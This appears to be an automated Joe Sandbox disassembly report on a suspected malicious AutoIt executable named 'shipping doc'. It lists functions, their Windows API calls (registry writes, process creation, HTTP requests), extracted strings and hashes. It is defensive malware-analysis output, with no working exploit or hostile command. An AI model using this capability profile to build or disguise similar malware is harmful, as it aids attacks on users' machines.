Instruction ID: 4bec7732dc4c7eb7c97285d178dc0a8ed06bb60d5bf79acf4ae575118d230cd6
Opcode Fuzzy Hash: aa5213df11202c668a4ed86925971c6dda560170191d9fb9ece50eb142756338
Instruction Fuzzy Hash: BA61D271900219BEEB14DF74CC41BBE7BA9FF09B60F14420AF919D62C1DB74A941EBA0

Function 00F490F8 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#ce, xrefs: 00F4926D
', xrefs: 00F85D3F
#include, xrefs: 00F491C7
#notrayicon, xrefs: 00F49167
#pragma compile, xrefs: 00F49153
Bad directive syntax error, xrefs: 00F85D70
#OnAutoItStartRegister, xrefs: 00F49197
#cs, xrefs: 00F491F3, 00F49245
#comments-end, xrefs: 00F49259
Cannot parse #include, xrefs: 00F85E4F
#comments-start, xrefs: 00F491DF, 00F49231
", xrefs: 00F85D29
#requireadmin, xrefs: 00F4917F
Unterminated group of comments, xrefs: 00F85E62
#include-once, xrefs: 00F491AF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: b53ec0a0b00ff7716418ceab9296af8b953761820f0f6f2026d8ce2861436776
Instruction ID: 490c7cc8db90e49c5d16ec3a4502df791ba663ea699305247c557d3c6e5ebc1e
Opcode Fuzzy Hash: b53ec0a0b00ff7716418ceab9296af8b953761820f0f6f2026d8ce2861436776
Instruction Fuzzy Hash: 6181E471A04615BBCB11BF60DC46FAB3BA9AF05750F044025FE05AA1D2EBB8DA05F7A1

Function 00FB3D97 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00FB3E16
_wcslen.LIBCMT ref: 00FB3E21
_wcslen.LIBCMT ref: 00FB3E78
_wcslen.LIBCMT ref: 00FB3EB6
GetDriveTypeW.KERNEL32(?), ref: 00FB3EF4
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB3F3C
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB3F77
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB3FA5

Strings

type cdaudio alias cd wait, xrefs: 00FB3F1F
close, xrefs: 00FB3E1C, 00FB3E36
set cd door , xrefs: 00FB3F46
open , xrefs: 00FB3F03
closed, xrefs: 00FB3E26, 00FB3E4B, 00FB3E64, 00FB3E9C, 00FB3EB5
close cd wait, xrefs: 00FB3F90
wait, xrefs: 00FB3F62
open, xrefs: 00FB3E72, 00FB3E77

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 2c9d61d923024d4b8d84b755619d016e987da8c917d6e00093095cc551a25393
Instruction ID: ac19afd8a7ed054fc61d97938679907e9022b677fa1fdfd139ba024560a19a09
Opcode Fuzzy Hash: 2c9d61d923024d4b8d84b755619d016e987da8c917d6e00093095cc551a25393
Instruction Fuzzy Hash: 7771F132A042169FC710EF39C8808BABBE5FF94764F00491DF89187291EB35EE49DB91

Function 00FA5971 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00FA5984
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FA5996
SetWindowTextW.USER32(?,?), ref: 00FA59AD
GetDlgItem.USER32(?,000003EA), ref: 00FA59C2
SetWindowTextW.USER32(00000000,?), ref: 00FA59C8
GetDlgItem.USER32(?,000003E9), ref: 00FA59D8
SetWindowTextW.USER32(00000000,?), ref: 00FA59DE
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FA59FF
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FA5A19
GetWindowRect.USER32(?,?), ref: 00FA5A22
_wcslen.LIBCMT ref: 00FA5A89
SetWindowTextW.USER32(?,?), ref: 00FA5AC5
GetDesktopWindow.USER32 ref: 00FA5ACB
GetWindowRect.USER32(00000000), ref: 00FA5AD2
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00FA5B29
GetClientRect.USER32(?,?), ref: 00FA5B36
PostMessageW.USER32(?,00000005,00000000,?), ref: 00FA5B5B
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FA5B85

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 7c1128f921700718b4766aa587934e103257a77c2ea16a4af83e4301f073b821
Instruction ID: 7417f6fb6be5e1f8265df92ba3773feb146e09b1ab4e8dc47d18c1de20e376f6
Opcode Fuzzy Hash: 7c1128f921700718b4766aa587934e103257a77c2ea16a4af83e4301f073b821
Instruction Fuzzy Hash: 35717F71A00B0ADFDB20DFA8CD85BAEBBF5FF48B14F104519E146A25A0D774E904EB50

Function 00FBFD35 Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00FBFD4E
LoadCursorW.USER32(00000000,00007F8A), ref: 00FBFD59
LoadCursorW.USER32(00000000,00007F00), ref: 00FBFD64
LoadCursorW.USER32(00000000,00007F03), ref: 00FBFD6F
LoadCursorW.USER32(00000000,00007F8B), ref: 00FBFD7A
LoadCursorW.USER32(00000000,00007F01), ref: 00FBFD85
LoadCursorW.USER32(00000000,00007F81), ref: 00FBFD90
LoadCursorW.USER32(00000000,00007F88), ref: 00FBFD9B
LoadCursorW.USER32(00000000,00007F80), ref: 00FBFDA6
LoadCursorW.USER32(00000000,00007F86), ref: 00FBFDB1
LoadCursorW.USER32(00000000,00007F83), ref: 00FBFDBC
LoadCursorW.USER32(00000000,00007F85), ref: 00FBFDC7
LoadCursorW.USER32(00000000,00007F82), ref: 00FBFDD2
LoadCursorW.USER32(00000000,00007F84), ref: 00FBFDDD
LoadCursorW.USER32(00000000,00007F04), ref: 00FBFDE8
LoadCursorW.USER32(00000000,00007F02), ref: 00FBFDF3
GetCursorInfo.USER32(?), ref: 00FBFE03
GetLastError.KERNEL32 ref: 00FBFE45

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: c4b7be679778ef042f15b1df11654b6761d8bf0cf892d12dd4555dbdd289ecc4
Instruction ID: 0247aa75567842d396d05f0255e47aca4464168591984be32419ad87c28b8796
Opcode Fuzzy Hash: c4b7be679778ef042f15b1df11654b6761d8bf0cf892d12dd4555dbdd289ecc4
Instruction Fuzzy Hash: 0C4135B0D083196ADB10DFBA8C8986EBFE8FF04764B50452AE11DE7291DB78D901CF91

Function 00FCC2DE Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 473registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC3E4
RegCreateKeyExW.ADVAPI32(?,?,00000000,00FDD0D0,00000000,?,00000000,?,?), ref: 00FCC46B
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00FCC4CB
_wcslen.LIBCMT ref: 00FCC51B
_wcslen.LIBCMT ref: 00FCC596
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00FCC5D9
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00FCC6E8
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00FCC887

Strings

REG_MULTI_SZ, xrefs: 00FCC61C
REG_BINARY, xrefs: 00FCC83A
REG_QWORD, xrefs: 00FCC7EA
REG_SZ, xrefs: 00FCC56B
REG_DWORD, xrefs: 00FCC72B
REG_EXPAND_SZ, xrefs: 00FCC4F4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Value$_wcslen$CloseConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 3165515054-966354055
Opcode ID: 68c6a05f905a9272679a2706ff503261343c54ad956dafd8281a537c758ab225
Instruction ID: e561d29cdd8b0f4d9f6892b199ea426009a86a86d229b27fe153200db68ff58a
Opcode Fuzzy Hash: 68c6a05f905a9272679a2706ff503261343c54ad956dafd8281a537c758ab225
Instruction Fuzzy Hash: 60125C356042019FDB14EF14C991F2ABBE5EF48724F04845DF98A9B3A2CB35ED41DB81

Function 00F60046 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F60046

Part of subcall function 00F6006D: InitializeCriticalSectionAndSpinCount.KERNEL32(0101070C,00000FA0,FFC328BA,?,?,?,?,00F82353,000000FF), ref: 00F6009C
Part of subcall function 00F6006D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F82353,000000FF), ref: 00F600A7
Part of subcall function 00F6006D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F82353,000000FF), ref: 00F600B8
Part of subcall function 00F6006D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F600CE
Part of subcall function 00F6006D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F600DC
Part of subcall function 00F6006D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F600EA
Part of subcall function 00F6006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F60115
Part of subcall function 00F6006D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F60120

___scrt_fastfail.LIBCMT ref: 00F60067

Part of subcall function 00F60023: __onexit.LIBCMT ref: 00F60029

Strings

WakeAllConditionVariable, xrefs: 00F600E2
InitializeConditionVariable, xrefs: 00F600C8
kernel32.dll, xrefs: 00F600B3
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F600A2
SleepConditionVariableCS, xrefs: 00F600D4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 0261e61d137cbb6ec1c291fda1f98b1ffe345dafd881e7cdc2632d4b86e80170
Instruction ID: 7d9d875fd75a35166901aef08440b3b2622c58031c946099566fe56c49631ef6
Opcode Fuzzy Hash: 0261e61d137cbb6ec1c291fda1f98b1ffe345dafd881e7cdc2632d4b86e80170
Instruction Fuzzy Hash: 55212632E417166BD7216BB4AC06F5A33A6EB06F61F240127F942D7284DF788844BA91

Function 00FA303A Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA30D0
_wcslen.LIBCMT ref: 00FA313B

Strings

CLASSNN, xrefs: 00FA3136, 00FA3147
REGEXPCLASS, xrefs: 00FA3198, 00FA31A9
NAME, xrefs: 00FA3278, 00FA3289
TEXT, xrefs: 00FA33BF
CLASS, xrefs: 00FA30CB, 00FA30E8
INSTANCE, xrefs: 00FA3396

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 407324b63f582f344625d7485ed44dbff41c81b6b209b73d6eb61e080b867ae3
Instruction ID: 6ba880b2364d9b53c5d5801fc565295325fc34d86bae92e515661bca958d8fe1
Opcode Fuzzy Hash: 407324b63f582f344625d7485ed44dbff41c81b6b209b73d6eb61e080b867ae3
Instruction Fuzzy Hash: 44E1C572E006169BCF15DFB8C8417EDBBB4BF16760F54411AF856E7280DB30AE85AB90

Function 00FB43DE Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00FDD0D0), ref: 00FB4445
_wcslen.LIBCMT ref: 00FB4459
_wcslen.LIBCMT ref: 00FB44B7
_wcslen.LIBCMT ref: 00FB4512
_wcslen.LIBCMT ref: 00FB455D
_wcslen.LIBCMT ref: 00FB45C5

Part of subcall function 00F43536: _wcslen.LIBCMT ref: 00F43541

GetDriveTypeW.KERNEL32(?,01006C00), ref: 00FB4661

Strings

removable, xrefs: 00FB4508, 00FB450D
all, xrefs: 00FB444F, 00FB4454
fixed, xrefs: 00FB4553, 00FB4558
network, xrefs: 00FB45BB, 00FB45C0
ramdisk, xrefs: 00FB460F
cdrom, xrefs: 00FB44AD, 00FB44B2
unknown, xrefs: 00FB4626

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 632e1f61f6ec926af6d24509b52c7f47fb2ad770f308fe8fb3f3e7e5390ab18b
Instruction ID: 39fa3d107d57906507eae6f49cd8cef1b8a9be2a7522f79b9abbf833a86c6e29
Opcode Fuzzy Hash: 632e1f61f6ec926af6d24509b52c7f47fb2ad770f308fe8fb3f3e7e5390ab18b
Instruction Fuzzy Hash: 7DB1F531A083029FC710EF29C990ABAB7E5BFA5720F14491DF995C7292DB34E845EE52

Function 00FCAF20 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FCB0BF
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB0D7
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB0FB
_wcslen.LIBCMT ref: 00FCB127
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB13B
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FCB15D
_wcslen.LIBCMT ref: 00FCB259

Part of subcall function 00FB04C5: GetStdHandle.KERNEL32(000000F6), ref: 00FB04E4

_wcslen.LIBCMT ref: 00FCB272
_wcslen.LIBCMT ref: 00FCB28D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FCB2DD
GetLastError.KERNEL32(00000000), ref: 00FCB32E
CloseHandle.KERNEL32(?), ref: 00FCB360
CloseHandle.KERNEL32(00000000), ref: 00FCB371
CloseHandle.KERNEL32(00000000), ref: 00FCB383
CloseHandle.KERNEL32(00000000), ref: 00FCB395
CloseHandle.KERNEL32(?), ref: 00FCB40A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 5398146d9f78cf899f40a0333a970f89df53535801a71e799dec76363d8ea33f
Instruction ID: 25424123cfaf997acbe2384eaed279874cf25f62f1abd23f3754c2b07c42e2fe
Opcode Fuzzy Hash: 5398146d9f78cf899f40a0333a970f89df53535801a71e799dec76363d8ea33f
Instruction Fuzzy Hash: 74F1AD35A043419FC714EF24C992F6EBBE1AF85324F18855DF8858B2A2CB35EC45EB52

Function 00F44C9A Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(01011990), ref: 00F83B6F
GetMenuItemCount.USER32(01011990), ref: 00F83C1F
GetCursorPos.USER32(?), ref: 00F83C63
SetForegroundWindow.USER32(00000000), ref: 00F83C6C
TrackPopupMenuEx.USER32(01011990,00000000,?,00000000,00000000,00000000), ref: 00F83C7F
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F83C8B

Strings

0, xrefs: 00F44CA8

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 8929bd1f0dabe1aaf1b13a9619935bbe659a7dc7bf8f60781c5b10c2e537bee1
Instruction ID: 428dceaf84043d33fb61f84f336d4c477aeb1c606917a5f180598f489ad27174
Opcode Fuzzy Hash: 8929bd1f0dabe1aaf1b13a9619935bbe659a7dc7bf8f60781c5b10c2e537bee1
Instruction Fuzzy Hash: 63714571A41205BEEB21AF24DC89FEABF64FF45764F240206F614761E1C7B5A910FB90

Function 00FD6BA7 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00FD6CB9

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FD6D2D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FD6D4F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD6D62
DestroyWindow.USER32(?), ref: 00FD6D83
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F40000,00000000), ref: 00FD6DB2
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD6DCB
GetDesktopWindow.USER32 ref: 00FD6DE4
GetWindowRect.USER32(00000000), ref: 00FD6DEB
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FD6E03
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FD6E1B

Part of subcall function 00F5ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00F5ADD2

Strings

tooltips_class32, xrefs: 00FD6D26, 00FD6DAB
0, xrefs: 00FD6C66

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 3ea060434cc671fedd9e1b1ace8ec96a6852e541a6256a53afe770f41cacc2d9
Instruction ID: e2629db944a29b2b8c9d7e0cf1b16f6bfb21e229186b4f93af68cb4d0e00bd26
Opcode Fuzzy Hash: 3ea060434cc671fedd9e1b1ace8ec96a6852e541a6256a53afe770f41cacc2d9
Instruction Fuzzy Hash: BD717974904245AFD721CF28C844BAABBFAFB89314F48041EF995C7361C775E902EB56

Function 00FD9010 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

DragQueryPoint.SHELL32(?,?), ref: 00FD9039

Part of subcall function 00FD7543: ClientToScreen.USER32(?,?), ref: 00FD7569
Part of subcall function 00FD7543: GetWindowRect.USER32(?,?), ref: 00FD75DF
Part of subcall function 00FD7543: PtInRect.USER32(?,?,00FD8A7B), ref: 00FD75EF

SendMessageW.USER32(?,000000B0,?,?), ref: 00FD90A2
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FD90AD
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FD90D0
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FD9117
SendMessageW.USER32(?,000000B0,?,?), ref: 00FD9130
SendMessageW.USER32(?,000000B1,?,?), ref: 00FD9147
SendMessageW.USER32(?,000000B1,?,?), ref: 00FD9169
DragFinish.SHELL32(?), ref: 00FD9170
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FD9263

Strings

@GUI_DRAGFILE, xrefs: 00FD9212
@GUI_DRAGID, xrefs: 00FD91DB
@GUI_DROPID, xrefs: 00FD9190

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: d15b9ce32cdb384f65389ea4ddd6e0fc4c6a6fa77291fd3de8f1a9949a4640e4
Instruction ID: 88cfb3c858d6c09a09553b8d7530deef7d6917eb308259821b77aa0fa028423a
Opcode Fuzzy Hash: d15b9ce32cdb384f65389ea4ddd6e0fc4c6a6fa77291fd3de8f1a9949a4640e4
Instruction Fuzzy Hash: 15615A71108305AFC701DFA0DC85DAFBBE9EF89350F400A1EF595922A1DB74DA49DB92

Function 00FBC394 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FBC3CE
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00FBC3E1
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00FBC3F5
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00FBC40E
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00FBC451
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00FBC467
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FBC472
